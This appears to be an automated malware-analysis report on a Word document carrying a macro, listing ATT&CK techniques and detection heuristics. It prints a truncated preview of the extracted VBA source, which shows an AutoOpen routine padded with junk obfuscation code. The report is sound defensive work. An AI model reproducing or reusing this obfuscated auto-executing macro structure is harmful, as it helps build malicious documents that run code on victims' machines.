Verdict: MALICIOUS
Risk Score: 282

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
- T1203 Exploitation for Client Execution
The sample contains a VBA macro with an autoopen subroutine, indicating it is designed to execute automatically upon opening. Critical heuristics indicate obfuscation techniques and the use of the GetObject API to execute code, likely to download and run a second-stage payload. The macro attempts to reassemble the string 'Win32_Process', which is a strong indicator of malicious intent.
Heuristics (8)

- ClamAV: Doc.Malware.00536d-6944243-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Malware.00536d-6944243-0
- VBA macros detected (medium, 4 related findings, OLE_VBA_MACROS): Document contains VBA macro code
- Dangerous API name reassembled from split string literals (critical, OLE_VBA_SPLIT_KEYWORD_OBFUSCATION): VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- GetObject call (high, OLE_VBA_GETOBJ): GetObject call
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 28486 bytes |

SHA-256: 37fda5a1f2aa7dc3747c915c70c644946ba37275032accf9dc8b51d3128511af
Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "kDAQAC"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "jAAwCAA"
Attribute VB_Base = "0{F1DEB5AA-AA7A-4F5D-B93D-2FD8EF38F997}{E431C063-FB9F-4623-8290-C3369EDB84FF}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "oDXABDDo"
Attribute VB_Base = "0{C870EB7E-95B3-45A3-A9C4-E9FAE6C4621D}{9F4924FF-48FB-438B-AE43-90F0ACF72393}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "q1AC_X"
Sub autoopen()
If nxGkAcC = dkAADQU Then
jADx1A4 = 253082994 * foAQA4wQ
ElseIf u4QCoGA = NAXCxZ Then
Set mUZQAk = hABD_o
ElseIf D4kwAAAc = foAAAA Then
YAAxA_U = tB1QDA / VUAABDZB * NGUAQAA + Sqr(iAoAAB)
ElseIf VGAwckAA = tAUA_4C Then
bAAxBC = 712427310
End If
If NDAAAU = Wxxk_A Then
MADAAQc = 821092024 * rXQ4AxZ
ElseIf oADcccA = rQUXXABw Then
Set JAkAxABQ = KcA_DXAA
ElseIf DUX1cA = AoA4o4Q Then
mAAUA4Z = vCBcAUCA / cA_oACQ * fkxUQQBk + Sqr(hkUBAwXQ)
ElseIf hAAAAAB = j_AQUo Then
M1AA1CDA = 360151527
End If
If sco1ZG = oAoBAoA Then
KAABUDx = 700594498 * sAAk1XA
ElseIf EwGAQxAA = XkAkBD Then
Set K_Ao4A = HAkBDZ
ElseIf NwZ1AABA = jACwXAD Then
ECwAAUZo = zUCAxoA / QUoZUCAo * cDZ1QwcA + Sqr(u1CZCZ)
ElseIf aADBokQA = qGAQUCQ Then
VXBxAA4 = 53062229
End If
jADDA1DA
If zAAABU = qAwD_1A1 Then
CAx1Qw = 125446710 * zZAAZw4
ElseIf EcXXBwBA = HAAUAAA Then
Set jAQCkQ = iUAooB
ElseIf wcowQ_ = i1XBAAAw Then
mCBADUG = BQGABc / wD41wxBD * fQUoZ_D + Sqr(joA_BB1)
ElseIf vA4411oB = bCUUAA Then
pA1wo__ = 894511143
End If
If uZAAAx_X = cXB1AZwG Then
Io4ADDC = 399256549 * jUAXAkG
ElseIf TA_BAwUc = P_AACBxA Then
Set vDDGoA = TAAAZUXU
ElseIf XQcUAB = NZZ4xwQG Then
wQCkDA = k_cUUQ / XUDQAQ_C * MQwAABA + Sqr(wAAAAA4)
ElseIf wQACAxQD = uA1c1_A Then
oUkDAkCC = 111865309
End If
End Sub
Attribute VB_Name = "B_Ccc_Qc"
Function jADDA1DA()
On Error Resume Next
If zAB4AAQ = MwBkkB Then
uXAAAD = 866597989 * zxA4A_D
ElseIf CCAcc1D = VCX4AUU Then
Set CBAXUQA = D_AQwkQZ
ElseIf vwBGBG_k = JwoBD1A Then
NAQkZxCw = DBADA1AX / ZwUAZ4BB * vcAAAcUD + Sqr(u_BUwZo)
ElseIf cCkCAUxU = vXDAAAD Then
PAAABQcx = 392269431
End If
If uBoAUoUx = wXB_1Q Then
GUwXUAZU = 239655598 * rDZAcA
ElseIf wAGDoABc = DUGUUAA Then
Set XBGcA4oA = UBACcQA
ElseIf SBQAD1 = XAcoBD Then
N1CAAcBA = cQAU4DXw / uw1U_QA1 * rZoDU_k + Sqr(SAZA4A)
ElseIf nBAGDD = BxABXBAA Then
CAGcAwQA = 904319934
End If
If 9433 < 99032 Then
qUAcAB = vbFalse
If vGo1AA4B = GQBAcDDA Then
wZ4DBDo = 851439880 * tA1AccBA
ElseIf DcXAGZA = X4AxBoU Then
Set WcDA4AA1 = rxAAA_Q
ElseIf kAADAw = GAABBA Then
kDADAcD = oAX_ZQxA / RDoDQAA * nBADXGQ + Sqr(jAUDAw)
ElseIf fB4AUGZ = TAcQBxXo Then
bQcQCA = 799267966
End If
If VCBQAAQA = oAA_BUD Then
zAAACA = 64022806 * zAQ_4A
ElseIf OAAQZD = H4kA_G Then
Set SAA4ZA = z4ACA1
ElseIf IDk1AGZ_ = pAAUUAk Then
HZGUUA = tAA_Bo1 / bABUC_ * FBAAAU + Sqr(K4AZGA)
ElseIf E4kwACAA = pwAAXx4 Then
E1Ac4Z = 434060514
End If
If V4AoB4G = KBBwwAA Then
DQQ1GUA = 836311093 * uAC4_G
ElseIf zAA_4Q = SAXoAx Then
Set nAAkAABU = AwACDBA
ElseIf bk4CAAQ = hUAoZDB Then
jwBUUkwQ = VDA_xBAA / ZGDDCDAA * IDQ4AUoA + Sqr(lAAACAx)
ElseIf OADUk_x = mAwZUoA Then
BA4UAAGc = 758232136
End If
End If
If AAAxGAwA = JXwAXA1 Then
iAQwBxQ = 97893313 * JXQADZA
ElseIf uAwXG4 = vADDAA Then
Set cwUZxkQZ = WABkCU_w
ElseIf Wc
... (truncated)